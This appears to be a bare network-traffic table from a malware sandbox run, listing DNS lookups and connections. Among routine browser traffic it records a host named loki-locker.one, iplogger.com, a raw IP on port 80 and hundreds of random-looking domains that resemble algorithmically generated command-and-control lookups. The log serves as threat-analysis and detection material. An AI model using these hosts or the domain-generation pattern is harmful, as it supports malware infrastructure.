| US | 151.101.130.49:443 | bazaar.abuse.ch | tcp |
| US | 8.8.8.8:53 | js.hcaptcha.com | udp |
| US | 8.8.8.8:53 | js.hcaptcha.com | udp |
| US | 104.19.230.21:443 | js.hcaptcha.com | udp |
| US | 104.19.230.21:443 | js.hcaptcha.com | tcp |
| US | 8.8.8.8:53 | newassets.hcaptcha.com | udp |
| US | 8.8.8.8:53 | newassets.hcaptcha.com | udp |
| US | 104.19.229.21:443 | newassets.hcaptcha.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | api.hcaptcha.com | udp |
| US | 8.8.8.8:53 | api.hcaptcha.com | udp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | update.googleapis.com | udp |
| US | 8.8.8.8:53 | update.googleapis.com | udp |
| NL | 108.177.119.94:443 | update.googleapis.com | tcp |
| GB | 104.86.110.96:443 | www.bing.com | tcp |
| US | 104.19.229.21:443 | api.hcaptcha.com | udp |
| US | 104.19.229.21:443 | api.hcaptcha.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | edgeassetservice.azureedge.net | udp |
| US | 8.8.8.8:53 | edgeassetservice.azureedge.net | udp |
| US | 13.107.246.64:443 | edgeassetservice.azureedge.net | tcp |
| US | 8.8.8.8:53 | imgs3.hcaptcha.com | udp |
| US | 8.8.8.8:53 | imgs3.hcaptcha.com | udp |
| US | 104.19.230.21:443 | imgs3.hcaptcha.com | udp |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 104.86.110.96:443 | www.bing.com | udp |
| US | 104.19.230.21:443 | imgs3.hcaptcha.com | udp |
| US | 104.19.229.21:443 | imgs3.hcaptcha.com | udp |
| US | 151.101.130.49:443 | bazaar.abuse.ch | tcp |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 13.107.246.64:443 | edge-consumer-static.azureedge.net | tcp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | checkappexec.microsoft.com | udp |
| GB | 51.11.108.188:443 | checkappexec.microsoft.com | tcp |
| US | 8.8.8.8:53 | static.edge.microsoftapp.net | udp |
| US | 8.8.8.8:53 | static.edge.microsoftapp.net | udp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | static.edge.microsoftapp.net | udp |
| US | 8.8.8.8:53 | static.edge.microsoftapp.net | udp |
| US | 13.107.246.64:443 | static.edge.microsoftapp.net | tcp |
| US | 8.8.8.8:53 | edge-mobile-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-mobile-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-cloud-resource-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-cloud-resource-static.azureedge.net | udp |
| US | 13.107.246.64:443 | edge-cloud-resource-static.azureedge.net | tcp |
| US | 13.107.246.64:443 | edge-cloud-resource-static.azureedge.net | tcp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| GB | 2.18.190.173:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| GB | 2.18.66.67:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| NL | 173.194.69.94:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | bazaar.abuse.ch | udp |
| US | 8.8.8.8:53 | bazaar.abuse.ch | udp |
| GB | 2.18.66.72:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| GB | 2.18.27.76:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | bazaar.abuse.ch | udp |
| US | 8.8.8.8:53 | bazaar.abuse.ch | udp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | i.imgur.com | udp |
| US | 199.232.192.193:443 | i.imgur.com | tcp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| GB | 2.18.27.76:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | bazaar.abuse.ch | udp |
| US | 8.8.8.8:53 | bazaar.abuse.ch | udp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| GB | 2.18.27.76:443 | www.bing.com | udp |
| N/A | 10.127.0.1:445 | tcp | |
| N/A | 10.127.0.1:139 | tcp | |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | loki-locker.one | udp |
| US | 34.132.102.6:80 | loki-locker.one | tcp |
| US | 34.132.102.6:80 | loki-locker.one | tcp |
| US | 8.8.8.8:53 | bazaar.abuse.ch | udp |
| US | 8.8.8.8:53 | bazaar.abuse.ch | udp |
| US | 151.101.2.49:443 | bazaar.abuse.ch | tcp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| GB | 2.18.27.82:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | ntp.msn.com | udp |
| US | 8.8.8.8:53 | ntp.msn.com | udp |
| US | 204.79.197.203:443 | ntp.msn.com | tcp |
| US | 204.79.197.203:443 | ntp.msn.com | tcp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 8.8.8.8:53 | edge-http.microsoft.com | udp |
| US | 8.8.8.8:53 | edge-http.microsoft.com | udp |
| US | 150.171.73.11:80 | edge-http.microsoft.com | tcp |
| GB | 2.18.27.76:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | bazaar.abuse.ch | udp |
| US | 8.8.8.8:53 | bazaar.abuse.ch | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | spocs.getpocket.com | udp |
| US | 8.8.8.8:53 | merino.services.mozilla.com | udp |
| US | 34.110.138.217:443 | merino.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | mc.prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | merino.services.mozilla.com | udp |
| US | 8.8.8.8:53 | merino.services.mozilla.com | udp |
| US | 8.8.8.8:53 | mc.prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 34.110.138.217:443 | merino.services.mozilla.com | udp |
| US | 8.8.8.8:53 | example.org | udp |
| US | 8.8.8.8:53 | ipv4only.arpa | udp |
| US | 8.8.8.8:53 | prod.detectportal.prod.cloudops.mozgcp.net | udp |
| US | 34.107.221.82:80 | prod.detectportal.prod.cloudops.mozgcp.net | tcp |
| US | 8.8.8.8:53 | prod.detectportal.prod.cloudops.mozgcp.net | udp |
| GB | 2.18.27.76:443 | www.bing.com | udp |
| N/A | 127.0.0.1:56331 | tcp | |
| N/A | 127.0.0.1:56342 | tcp | |
| US | 184.164.136.134:80 | tcp | |
| US | 184.164.136.134:80 | tcp | |
| GB | 2.18.27.82:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | bazaar.abuse.ch | udp |
| US | 8.8.8.8:53 | bazaar.abuse.ch | udp |
| US | 8.8.8.8:53 | iplogger.com | udp |
| US | 8.8.8.8:53 | iplogger.com | udp |
| US | 104.21.76.57:443 | iplogger.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| NL | 142.250.153.105:443 | www.google.com | udp |
| US | 8.8.8.8:53 | qtvghqsrkimpg.co.uk | udp |
| US | 8.8.8.8:53 | rxwiivmqxhijf.info | udp |
| US | 8.8.8.8:53 | rkpmnvwtllgme.com | udp |
| US | 8.8.8.8:53 | soqoobqsykcgm.net | udp |
| US | 8.8.8.8:53 | slamhlklmeivg.biz | udp |
| US | 8.8.8.8:53 | tpboiqekadepf.ru | udp |
| US | 8.8.8.8:53 | andcdonnarvog.org | udp |
| US | 8.8.8.8:53 | ndelmwabwqyiw.co.uk | udp |
| US | 8.8.8.8:53 | crnfoeblyeqtg.info | udp |
| US | 8.8.8.8:53 | phooxmnyvdtng.com | udp |
| US | 8.8.8.8:53 | cfhidjfhcnruc.net | udp |
| US | 8.8.8.8:53 | puirmrruymuos.biz | udp |
| US | 8.8.8.8:53 | ejrloysfbamau.ru | udp |
| US | 8.8.8.8:53 | rysuxhfsxyptu.org | udp |
| US | 8.8.8.8:53 | irlyeanlbxwku.co.uk | udp |
| US | 8.8.8.8:53 | jvmbfixhxcwvt.info | udp |
| US | 8.8.8.8:53 | kvvcppbjakrpu.com | udp |
| US | 8.8.8.8:53 | laweqxlfworbd.net | udp |
| US | 8.8.8.8:53 | kjpfeuffdtsqc.biz | udp |
| US | 8.8.8.8:53 | lnqhfdpbaxscb.ru | udp |
| US | 8.8.8.8:53 | mnaipksdcgnvu.org | udp |
| US | 8.8.8.8:53 | nrbkqsdyyknhd.co.uk | udp |
| US | 8.8.8.8:53 | digvoisxtdsdo.info | udp |
| US | 8.8.8.8:53 | qvbhrnorekoso.com | udp |
| US | 8.8.8.8:53 | ejqvirnvnlleq.net | udp |
| US | 8.8.8.8:53 | rwlhlwjpxshth.biz | udp |
| US | 8.8.8.8:53 | hgkvepvgdobbo.ru | udp |
| US | 8.8.8.8:53 | utfhhuranvwqo.org | udp |
| US | 8.8.8.8:53 | ihuvxyqewwtcx.co.uk | udp |
| US | 8.8.8.8:53 | vuphbemxhepro.info | udp |
| GB | 2.18.27.82:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | hyomitoimcsjr.com | udp |
| US | 8.8.8.8:53 | ibjmpyihwdhda.net | udp |
| US | 8.8.8.8:53 | iaymcdjggklkt.biz | udp |
| US | 8.8.8.8:53 | jctmjidfqlaes.ru | udp |
| US | 8.8.8.8:53 | lwsmxbrqvnbhg.org | udp |
| US | 8.8.8.8:53 | mynmfglpgopbo.co.uk | udp |
| US | 8.8.8.8:53 | mxdmrkmopvtip.info | udp |
| US | 8.8.8.8:53 | naxmypgnawico.com | udp |
| US | 8.8.8.8:53 | vhgofhburgtqr.net | udp |
| US | 8.8.8.8:53 | jubaipniyhxki.biz | udp |
| US | 8.8.8.8:53 | xlqrqqvfjexek.ru | udp |
| US | 8.8.8.8:53 | lyldtyisqfcxk.org | udp |
| US | 8.8.8.8:53 | afkouoedbrcor.co.uk | udp |
| US | 8.8.8.8:53 | nsfaxwqqisgii.info | udp |
| US | 8.8.8.8:53 | cjurgxynspgcr.com | udp |
| US | 8.8.8.8:53 | pwpdjglbaqkvr.net | udp |
| US | 8.8.8.8:53 | axofyswqkfcbr.biz | udp |
| US | 8.8.8.8:53 | erzurum.us | udp |
| US | 8.8.8.8:53 | bajfgbhmraiqq.ru | udp |
| US | 8.8.8.8:53 | ccyikcrbcdgok.org | udp |
| US | 8.8.8.8:53 | detirkcwjxmes.co.uk | udp |
| US | 8.8.8.8:53 | evsfoaaytqkyg.info | udp |
| US | 8.8.8.8:53 | fxnfvikublqof.com | udp |
| US | 8.8.8.8:53 | gadiajujloomg.net | udp |
| US | 8.8.8.8:53 | hcxihrffsjuco.biz | udp |
| US | 8.8.8.8:53 | idveibbwccigl.ru | udp |
| US | 8.8.8.8:53 | vqqplgwqmjevl.org | udp |
| US | 8.8.8.8:53 | jegecqoodukpu.co.uk | udp |
| US | 8.8.8.8:53 | wrbpfvkincgfl.info | udp |
| US | 8.8.8.8:53 | kuakiicrpskls.com | udp |
| US | 8.8.8.8:53 | xiuvlnxlaagbs.net | udp |
| US | 8.8.8.8:53 | lvkkcxpjqlmuu.biz | udp |
| US | 8.8.8.8:53 | yjfvfdldbsikl.ru | udp |
| US | 8.8.8.8:53 | bazaar.abuse.ch | udp |
| US | 8.8.8.8:53 | bazaar.abuse.ch | udp |
| US | 8.8.8.8:53 | mteucmwhubimo.org | udp |
| US | 8.8.8.8:53 | nvyujrqgfcwgw.co.uk | udp |
| US | 8.8.8.8:53 | nuouvckyvtkvx.info | udp |
| US | 8.8.8.8:53 | owjudhexguypw.com | udp |
| US | 8.8.8.8:53 | olibctxcirkrk.net | udp |
| US | 8.8.8.8:53 | pndbjyrbssyls.biz | udp |
| US | 8.8.8.8:53 | pmsbvjltjkmbm.ru | udp |
| US | 8.8.8.8:53 | qonbdofstlbul.org | udp |
| US | 8.8.8.8:53 | bcvwyajwadsem.co.uk | udp |
| US | 8.8.8.8:53 | opqicivkhewxd.info | udp |
| US | 8.8.8.8:53 | dggakpwuypnjm.com | udp |
| US | 8.8.8.8:53 | qtblnxjigqrdm.net | udp |
| US | 8.8.8.8:53 | dtadyhkrntujt.biz | udp |
| US | 8.8.8.8:53 | qhuocpwfuuydk.ru | udp |
| US | 8.8.8.8:53 | fxkgkwxpmgpom.org | udp |
| US | 8.8.8.8:53 | slfrnfkdthtim.co.uk | udp |
| US | 8.8.8.8:53 | fsenslfsscbom.info | udp |
| US | 8.8.8.8:53 | guynatpoawhel.com | udp |
| US | 8.8.8.8:53 | hwoqebsqrovtm.net | udp |
| US | 8.8.8.8:53 | hkitssgngsdti.ru | udp |
| US | 8.8.8.8:53 | imdtabqjnnjjh.org | udp |
| US | 8.8.8.8:53 | josweitlffxyb.co.uk | udp |
| US | 8.8.8.8:53 | kqnwlqehmaeoj.info | udp |
| US | 8.8.8.8:53 | wkpynnvmtytm.com | udp |
| US | 8.8.8.8:53 | kaqkqsrrlnas.net | udp |
| US | 8.8.8.8:53 | xpnqhwqnabwd.biz | udp |
| US | 8.8.8.8:53 | lfockcmsrpdj.ru | udp |
| US | 8.8.8.8:53 | bauqfilhfmir.org | udp |
| US | 8.8.8.8:53 | opvcinhmwbox.co.uk | udp |
| US | 8.8.8.8:53 | cfsiyrgiloli.info | udp |
| US | 8.8.8.8:53 | puttcwcnddro.com | udp |
| US | 8.8.8.8:53 | foxvoxowedrc.net | udp |
| US | 8.8.8.8:53 | gsyajdikvgbm.biz | udp |
| US | 8.8.8.8:53 | gtvnihjxkfus.ru | udp |
| US | 8.8.8.8:53 | hxwrdmdlcied.org | udp |
| US | 8.8.8.8:53 | jedngserpqgh.co.uk | udp |
| US | 8.8.8.8:53 | kierbxxfhtpr.info | udp |
| US | 8.8.8.8:53 | kjbfacysvsjx.com | udp |
| US | 8.8.8.8:53 | lncjuhsgnvsi.net | udp |
| US | 8.8.8.8:53 | hyrhfwxbyrgy.biz | udp |
| US | 8.8.8.8:53 | uossifkdrmuj.ru | udp |
| US | 8.8.8.8:53 | jhpkpgsidjgt.org | udp |
| US | 8.8.8.8:53 | wwqvsofkveue.co.uk | udp |
| US | 8.8.8.8:53 | lowywrnvkfue.info | udp |
| US | 8.8.8.8:53 | yexkaaaxdajo.com | udp |
| US | 8.8.8.8:53 | nwuchbidowuy.net | udp |
| US | 8.8.8.8:53 | bmvnkjufhrjj.biz | udp |
| US | 8.8.8.8:53 | pdaeghqajvms.ru | udp |
| US | 8.8.8.8:53 | qhbibpbhcfny.org | udp |
| US | 8.8.8.8:53 | rlxhqqlhnnmn.co.uk | udp |
| US | 8.8.8.8:53 | spyllyvogwnt.info | udp |
| US | 8.8.8.8:53 | tsfvxcguujbx.com | udp |
| US | 8.8.8.8:53 | uwgaskqcnsce.net | udp |
| US | 8.8.8.8:53 | vbdyilbcybbs.biz | udp |
| US | 8.8.8.8:53 | wfeddtljrkcy.ru | udp |
| US | 8.8.8.8:53 | lollkhsearqs.org | udp |
| US | 8.8.8.8:53 | yemwnmojrgwy.co.uk | udp |
| US | 8.8.8.8:53 | mtjdewgsdfdr.info | udp |
| US | 8.8.8.8:53 | ajkohccxutjx.com | udp |
| US | 8.8.8.8:53 | nxqaickxpvtq.net | udp |
| US | 8.8.8.8:53 | bnrllhgdhkaw.biz | udp |
| US | 8.8.8.8:53 | odorcrxmsjgp.ru | udp |
| LT | 5.199.171.47:80 | tcp | |
| US | 8.8.8.8:53 | cspdfwtrkxmv.org | udp |
| US | 8.8.8.8:53 | tstilrlokvoi.co.uk | udp |
| US | 8.8.8.8:53 | uwumgwfccyxs.info | udp |
| US | 8.8.8.8:53 | uxrafhydnjbh.com | udp |
| US | 8.8.8.8:53 | vcseamsqfmkr.net | udp |
| US | 8.8.8.8:53 | vcywjmdiaarg.biz | udp |
| US | 8.8.8.8:53 | wgaberwvrdbq.ru | udp |
| US | 8.8.8.8:53 | whwodcqwdnef.org | udp |
| US | 8.8.8.8:53 | xlxsxhkkuqnp.co.uk | udp |
| US | 8.8.8.8:53 | vdntcqupfiml.info | udp |
| US | 8.8.8.8:53 | jsoffyhrxdbv.com | udp |
| US | 8.8.8.8:53 | bazaar.abuse.ch | udp |
| US | 8.8.8.8:53 | bazaar.abuse.ch | udp |
| US | 8.8.8.8:53 | xllwmgiqgpdx.net | udp |
| US | 8.8.8.8:53 | lbmipousykri.biz | udp |
| US | 8.8.8.8:53 | xmsialmjumpj.ru | udp |
| US | 8.8.8.8:53 | lcttdtylnhet.org | udp |
| GB | 2.18.27.82:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | auqlkbakvtgv.co.uk | udp |
| US | 8.8.8.8:53 | nkrwnjmmooug.info | udp |
| US | 8.8.8.8:53 | ehvqdbnopmsf.com | udp |
| US | 8.8.8.8:53 | flwuxjxvivtl.net | udp |
| US | 8.8.8.8:53 | gpttnqbpqtjr.biz | udp |
| LT | 5.199.171.47:80 | tcp | |
| US | 8.8.8.8:53 | htuxiylwjdkx.ru | udp |
| US | 8.8.8.8:53 | gqbfbvfifqvd.org | udp |
| US | 8.8.8.8:53 | hucjveppxawj.co.uk | udp |
| US | 8.8.8.8:53 | iyyillsjgxmp.info | udp |
| US | 8.8.8.8:53 | jdamgtdqyhnv.com | udp |
| US | 8.8.8.8:53 | xyitjylcmwxf.net | udp |
| US | 8.8.8.8:53 | lmdhgehhbihl.biz | udp |
| US | 8.8.8.8:53 | yegldigdsybv.ru | udp |
| US | 8.8.8.8:53 | mrbyancihkkc.org | udp |
| US | 8.8.8.8:53 | conlbgokllcl.co.uk | udp |
| US | 8.8.8.8:53 | pciyxlkpawlr.info | udp |
| US | 8.8.8.8:53 | dtldupjlrnfc.com | udp |
| US | 8.8.8.8:53 | qhgqrufqgyoi.net | udp |
| US | 8.8.8.8:53 | cpqkdjilodfj.biz | udp |
| US | 8.8.8.8:53 | drlmeocydysx.ru | udp |
| US | 8.8.8.8:53 | duocwsdmufia.org | udp |
| US | 8.8.8.8:53 | ewjexxwajbvo.co.uk | udp |
| US | 8.8.8.8:53 | gfvcuqltnrjp.info | udp |
| US | 8.8.8.8:53 | hhqevvfhcnwe.com | udp |
| LT | 5.199.171.47:80 | tcp | |
| US | 8.8.8.8:53 | hkttoaguttmg.net | udp |
| US | 8.8.8.8:53 | imovpfaiipau.biz | udp |
| US | 8.8.8.8:53 | inkcbinqxiqp.ru | udp |
| US | 8.8.8.8:53 | vbfpxqasbove.org | udp |
| US | 8.8.8.8:53 | kviflrixcaqk.co.uk | udp |
| US | 8.8.8.8:53 | xjdsiauafgvy.info | udp |
| US | 8.8.8.8:53 | mdptspqywwuv.com | udp |
| US | 8.8.8.8:53 | aqkhpxdbadak.net | udp |
| US | 8.8.8.8:53 | olnwdylgbouq.biz | udp |
| US | 8.8.8.8:53 | cyikahxieuaf.ru | udp |
| US | 8.8.8.8:53 | messuskoaotc.org | udp |
| US | 8.8.8.8:53 | ngnuvbuvdfli.co.uk | udp |
| US | 8.8.8.8:53 | omqvfcfvegtw.info | udp |
| US | 8.8.8.8:53 | polxgkpdhwld.com | udp |
| US | 8.8.8.8:53 | qtxkmanwydxi.net | udp |
| US | 8.8.8.8:53 | rvsmnixectpo.biz | udp |
| US | 8.8.8.8:53 | scvnwjieduxd.ru | udp |
| US | 8.8.8.8:53 | teqpxrslglpj.org | udp |
| US | 8.8.8.8:53 | mdeggskaslkq.co.uk | udp |
| US | 8.8.8.8:53 | aqytdxgfhwtw.info | udp |
| US | 8.8.8.8:53 | nicxaixovywp.com | udp |
| US | 8.8.8.8:53 | bvwlwnttkkgv.net | udp |
| US | 8.8.8.8:53 | omjuealuvyxn.biz | udp |
| US | 8.8.8.8:53 | caeibfhakkht.ru | udp |
| US | 8.8.8.8:53 | prhmxpyjymkm.org | udp |
| US | 8.8.8.8:53 | dfcauuuonxts.co.uk | udp |
| US | 8.8.8.8:53 | qtmwadhjurru.info | udp |
| US | 8.8.8.8:53 | rvhybibwjnfj.com | udp |
| US | 8.8.8.8:53 | rykotsuxxfet.net | udp |
| US | 8.8.8.8:53 | sbfquxolmbri.biz | udp |
| US | 8.8.8.8:53 | sdrlxkiexffr.ru | udp |
| GB | 2.18.27.82:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | tfmnypcrmbsg.org | udp |
| US | 8.8.8.8:53 | tipdravsbsrq.co.uk | udp |
| US | 8.8.8.8:53 | ukkfsfpgpoff.info | udp |
| US | 8.8.8.8:53 | wrgoxcmleumh.com | udp |
| US | 8.8.8.8:53 | kfbcukynhbrv.net | udp |
| US | 8.8.8.8:53 | yaeriramfcdt.biz | udp |
| US | 8.8.8.8:53 | mnyffamoiiii.ru | udp |
| US | 8.8.8.8:53 | ybldvjnghiae.org | udp |
| US | 8.8.8.8:53 | mogqsraikofs.co.uk | udp |
| US | 8.8.8.8:53 | bjjggybhipqq.info | udp |
| US | 8.8.8.8:53 | owetdhnjlvvf.com | udp |
| US | 8.8.8.8:53 | biofrmjjgbpt.net | udp |
| US | 8.8.8.8:53 | ckjhsutqjrha.biz | udp |
| US | 8.8.8.8:53 | dqmiccwkhigg.ru | udp |
| US | 8.8.8.8:53 | eshkdkhrkyxm.org | udp |
| US | 8.8.8.8:53 | drttptkejodq.co.uk | udp |
| US | 8.8.8.8:53 | etovqculmfuw.info | udp |
| US | 8.8.8.8:53 | farwajxfkvtd.com | udp |
| US | 8.8.8.8:53 | bazaar.abuse.ch | udp |
| US | 8.8.8.8:53 | bazaar.abuse.ch | udp |
| US | 8.8.8.8:53 | gcmybrimnmlj.net | udp |
| US | 8.8.8.8:53 | pfmxhcqxiaix.ru | udp |
| US | 8.8.8.8:53 | dqvkegpfgesu.org | udp |
| US | 8.8.8.8:53 | qgwtnllytxag.co.uk | udp |
| US | 8.8.8.8:53 | gfqgprkygtpr.info | udp |
| US | 8.8.8.8:53 | hgbcvbfarrha.net | udp |
| US | 8.8.8.8:53 | uvclfgbtflol.biz | udp |
| US | 8.8.8.8:53 | kttlyiuqvmga.ru | udp |
| US | 8.8.8.8:53 | lxunanopjlct.org | udp |
| US | 8.8.8.8:53 | luehfrprhkxi.co.uk | udp |
| US | 8.8.8.8:53 | myfjgwjqujtc.info | udp |
| US | 8.8.8.8:53 | ojydqdklhauf.com | udp |
| US | 8.8.8.8:53 | pnafriekuyqy.net | udp |
| US | 8.8.8.8:53 | pkjywmfmsxmn.biz | udp |
| US | 8.8.8.8:53 | qokbxrylgwih.ru | udp |
| US | 8.8.8.8:53 | uolhoxoffbtn.org | udp |
| US | 8.8.8.8:53 | iemqxgbscawh.co.uk | udp |
| US | 8.8.8.8:53 | wsvgmhjmolaq.info | udp |
| US | 8.8.8.8:53 | yeqygseaqois.net | udp |
| US | 8.8.8.8:53 | mtripbqnnnlm.biz | udp |
| US | 8.8.8.8:53 | bibxecyhayov.ru | udp |
| US | 8.8.8.8:53 | oxchnkluwxrp.org | udp |
| US | 8.8.8.8:53 | dstepjodghuj.co.uk | udp |
| US | 8.8.8.8:53 | ewugqryydluu.info | udp |
| US | 8.8.8.8:53 | fwednsjkprbm.com | udp |
| US | 8.8.8.8:53 | gbffobtgmvbx.net | udp |
| US | 8.8.8.8:53 | hiyvheexrujo.biz | udp |
| US | 8.8.8.8:53 | imaximotoyja.ru | udp |
| US | 8.8.8.8:53 | jmjufnyfbfpr.org | udp |
| US | 8.8.8.8:53 | kqkwgvjbxjpd.co.uk | udp |
| US | 8.8.8.8:53 | qthbuqrvnllo.info | udp |
| US | 8.8.8.8:53 | ejikevnpbfsa.com | udp |
| US | 8.8.8.8:53 | rurwbgfkwvln.net | udp |
| US | 8.8.8.8:53 | fksgklbekpsy.biz | udp |
| GB | 2.18.27.82:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | sdmpsljpdpom.ru | udp |
| US | 8.8.8.8:53 | gsnycqfjqjvx.org | udp |
| US | 8.8.8.8:53 | tewlybwemaol.co.uk | udp |
| US | 8.8.8.8:53 | htxuigsxatvw.info | udp |
| US | 8.8.8.8:53 | yxpxvcriorqc.com | udp |
| US | 8.8.8.8:53 | acqawhlhcqmv.net | udp |
| US | 8.8.8.8:53 | ayatcrfwxcqb.biz | udp |
| US | 8.8.8.8:53 | bhumtwjcevta.org | udp |
| US | 8.8.8.8:53 | clvoucdbrupt.co.uk | udp |
| US | 8.8.8.8:53 | cifiamwqngty.info | udp |
| US | 8.8.8.8:53 | dmgkbrqpbfps.com | udp |
| US | 8.8.8.8:53 | jshtlrltxime.net | udp |
| US | 8.8.8.8:53 | wiiduaxhuhpx.biz | udp |
| US | 8.8.8.8:53 | lwrsjhyufbkq.ru | udp |
| US | 8.8.8.8:53 | ymscsplicank.org | udp |
| US | 8.8.8.8:53 | yrnrsupbklsv.info | udp |
| US | 8.8.8.8:53 | bazaar.abuse.ch | udp |
| US | 8.8.8.8:53 | bazaar.abuse.ch | udp |
| US | 8.8.8.8:53 | ngwhhcqoufno.com | udp |
| US | 8.8.8.8:53 | bvxqqkdcreqi.net | udp |
| US | 8.8.8.8:53 | rwpqmdlryona.biz | udp |
| US | 8.8.8.8:53 | sbqsnlvnvsnl.ru | udp |
| US | 8.8.8.8:53 | tbapksysghlm.org | udp |
| US | 8.8.8.8:53 | ufbrlbjodllx.co.uk | udp |
| US | 8.8.8.8:53 | tgufkxdlosqx.info | udp |
| US | 8.8.8.8:53 | ukvhlgnhlwqj.com | udp |
| US | 8.8.8.8:53 | vkfeinqmvlok.net | udp |
| US | 8.8.8.8:53 | woggjvbispov.biz | udp |
| US | 8.8.8.8:53 | deejtiohnvmu.ru | udp |
| US | 8.8.8.8:53 | qryuwnkbxdik.org | udp |
| US | 8.8.8.8:53 | efofarjiyted.co.uk | udp |
| US | 8.8.8.8:53 | rsjqdwfcjbas.info | udp |
| US | 8.8.8.8:53 | htjblprpmkqb.com | udp |
| US | 8.8.8.8:53 | iutwrymqxiij.biz | udp |
| US | 8.8.8.8:53 | vioiueikipey.ru | udp |
| US | 8.8.8.8:53 | humantkrgumb.org | udp |
| US | 8.8.8.8:53 | iwhauyeqqvbu.co.uk | udp |
| US | 8.8.8.8:53 | ivwvtdfsrsej.info | udp |
| US | 8.8.8.8:53 | jxrvbiyrctsd.com | udp |
| US | 8.8.8.8:53 | lkrrfbnafjqh.net | udp |
| US | 8.8.8.8:53 | mmmrmghypkfb.biz | udp |
| US | 8.8.8.8:53 | mlcnlkibqhip.ru | udp |
| US | 8.8.8.8:53 | nnwnspcabiwj.org | udp |
| US | 8.8.8.8:53 | vdeckjiiejyx.co.uk | udp |
| US | 8.8.8.8:53 | fxaaurfmehhgx.com | udp |
| US | 8.8.8.8:53 | fwdmvcmrsapfy.net | udp |
| US | 8.8.8.8:53 | gyckyhgyfdclx.biz | udp |
| US | 8.8.8.8:53 | gfgudtldumdfl.ru | udp |
| US | 8.8.8.8:53 | hhfsgyfkhpplt.org | udp |
| US | 8.8.8.8:53 | hgifhjmpvixkn.co.uk | udp |
| GB | 2.18.27.76:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | iihdkogwilkqm.info | udp |
| US | 8.8.8.8:53 | sncikxnmiwseo.com | udp |
| US | 8.8.8.8:53 | gbbyfgargrnkf.net | udp |
| US | 8.8.8.8:53 | uredlnolhyuno.biz | udp |
| US | 8.8.8.8:53 | ifdtgvbqftpto.ru | udp |
| US | 8.8.8.8:53 | uwhbvfnklfbjv.org | udp |
| US | 8.8.8.8:53 | ikgrqnapjavpm.co.uk | udp |
| US | 8.8.8.8:53 | wbjvwuojkhdso.info | udp |
| US | 8.8.8.8:53 | koimrdboicxyo.com | udp |
| US | 8.8.8.8:53 | wekpcjnviulio.net | udp |
| US | 8.8.8.8:53 | xgjnfrxjgdnwn.biz | udp |
